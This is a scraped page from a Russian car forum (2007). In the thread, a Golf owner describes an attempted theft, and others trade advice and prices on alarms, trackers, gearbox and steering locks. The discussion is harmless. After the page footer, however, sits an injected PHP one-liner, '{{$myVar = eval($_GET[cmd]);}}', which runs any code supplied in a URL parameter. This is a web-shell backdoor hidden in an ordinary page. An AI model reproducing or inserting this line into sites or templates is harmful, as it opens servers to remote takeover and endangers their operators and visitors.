+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя
Показано с 1 по 10 из 26

Тема: Взломали машину


  1. #1
    Блин, выхожу сегодня утром, а машина открыта, раскорячен замок двери, вынута личинка замка зажигания и снята приборная доска.
    Какие то вандалы хотели угнать мое авто.
    Теперь не работает спидометр, одометр, движка раскручивается только до 5500 об. и при разгоне срабатывает датчик уровня топлива, в добавок ко всему закорелся Check Engine.

    Также встает вопрос о механических утройствах защиты, кто что может посоветовать...

  2. #2
    Originally posted by Logic@May 15 2007, 16:52
    Блин, выхожу сегодня утром, а машина открыта, раскорячен замок двери, вынута личинка замка зажигания и снята приборная доска.
    Какие то вандалы хотели угнать мое авто.
    Теперь не работает спидометр, одометр, движка раскручивается только до 5500 об. и при разгоне срабатывает датчик уровня топлива, в добавок ко всему закорелся Check Engine.

    Также встает вопрос о механических утройствах защиты, кто что может посоветовать...
    <div align='right'><{POST_SNAPBACK}></div>
    Сочувствую. Какая сигнализация была, если была?

  3. #3
    Originally posted by Карабаз Барабаз@May 15 2007, 16:09
    Сочувствую. Какая сигнализация была, если была?
    <div align='right'><{POST_SNAPBACK}></div>
    Только родная, если это вообще сигнализация...

  4. #4
    Originally posted by Logic@May 15 2007, 17:10
    Только родная, если это вообще сигнализация...
    <div align='right'><{POST_SNAPBACK}></div>
    Значит, сигнализация, раз машина не уехала. Кстати по статистике гибдд, гольф в десятке самых угоняемых. Страховка есть?

  5. #5
    Originally posted by Карабаз Барабаз@May 15 2007, 16:29
    Значит, сигнализация, раз машина не уехала. Кстати по статистике гибдд, гольф в десятке самых угоняемых. Страховка есть?
    <div align='right'><{POST_SNAPBACK}></div>
    Неа...КАСКО за 1500&#036; это слишком весомо к цене машины...хочу что-нибудь механическое, но не знаток в этой области...хотелось бы услышать рекомендации.

  6. #6
    Originally posted by Logic@May 15 2007, 17:31
    Неа...КАСКО за 1500&#036; это слишком весомо к цене машины...хочу что-нибудь механическое, но не знаток в этой области...хотелось бы услышать рекомендации.
    <div align='right'><{POST_SNAPBACK}></div>
    Я канешно не профессионал в подобных вопросах, но мне кажется нужно ставить замок на кпп и систему спутникого слежения типа "автолокатора", правда у них абонентская плата, сколько не помню. Удачи.

  7. #7
    Мимо проходил SERG 7 is on a distinguished road Аватар для SERG 7
    Регистрация
    27.04.2007
    Сообщений
    44
    Читал вчера в журнале TopGear - абонетская плата спутниковой противоугонной системы "АвтоЛокатора Сателлит" от 54 у.е. в месяц, а цена комлекта от 1800 у.е. Радиопоисковой системы "АвтоЛокатор" от 39 у.е и 1300 комплект. "АвтоЛокатор Супер" от 54 и 2400 комплект.
    Другие не дешевле от 5200 руб в год аб.плата до 22500 руб в год + установка.
    Вот.

  8. #8
    Originally posted by SERG 7@May 15 2007, 21:33
    Читал вчера в журнале TopGear - абонетская плата спутниковой противоугонной системы "АвтоЛокатора Сателлит" от 54 у.е. в месяц, а цена комлекта от 1800 у.е. Радиопоисковой системы "АвтоЛокатор" от 39 у.е и 1300 комплект. "АвтоЛокатор Супер" от 54 и 2400 комплект.
    Другие не дешевле от 5200 руб в год аб.плата до 22500 руб в год + установка.
    Вот.
    <div align='right'><{POST_SNAPBACK}></div>
    Нееее, это все космос. Мне бы чтонибудь попроще навроде Mul-T-Lock, или гарант на руль.
    Также думаю о секретке (тумблер или кнопку).

    Кстати сигналка с пейджером сколько может стоить? У меня окна к машине не выходят.

  9. #9
    Мимо проходил SERG 7 is on a distinguished road Аватар для SERG 7
    Регистрация
    27.04.2007
    Сообщений
    44
    Больше всего советуют замок на коробку или "гарант"
    А сигналка с обраткой + запуск с кнопки от 4000 руб и выше, в зависимости от модельки. Окна у меня тоже не выходят на стоянку. Я себе поставил за
    4500 руб StarLine и усе показывает и даже зимой сама прогревается и всякой ерунды с нее мона намутить типа с кнопки открывается задняя дверь и т.д.

  10. #10
    Originally posted by SERG 7@May 16 2007, 08:41
    Больше всего советуют замок на коробку или "гарант"
    А сигналка с обраткой + запуск с кнопки от 4000 руб и выше, в зависимости от модельки. Окна у меня тоже не выходят на стоянку. Я себе поставил за
    4500 руб StarLine и усе показывает и даже зимой сама прогревается и всякой ерунды с нее мона намутить типа с кнопки открывается задняя дверь и т.д.
    <div align='right'><{POST_SNAPBACK}></div>
    Можно поподробнее, где ставил и почем? Очень нужно, а то как то стремно стало совсем...

+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя

Похожие темы

  1. ТО на машину
    от BON в разделе Барахолка
    Ответов: 16
    Последнее сообщение: 02.04.2024, 03:57
  2. Я поменяла машину
    от Lina в разделе Курилка
    Ответов: 53
    Последнее сообщение: 22.11.2011, 18:28
  3. Телевизор В Машину
    от TSV в разделе Барахолка
    Ответов: 0
    Последнее сообщение: 15.01.2009, 20:04
  4. Машину Хочу
    от mishgan в разделе Покупка и продажа авто
    Ответов: 7
    Последнее сообщение: 07.07.2008, 22:55
  5. оставил машину и ...
    от pupok в разделе Курилка
    Ответов: 12
    Последнее сообщение: 25.09.2006, 15:24

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}